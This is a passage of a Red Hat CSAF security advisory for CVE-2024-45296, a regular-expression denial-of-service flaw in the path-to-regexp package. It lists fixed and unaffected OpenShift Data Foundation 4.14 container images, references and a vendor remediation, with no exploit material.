"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-01-15T01:19:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:0323"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
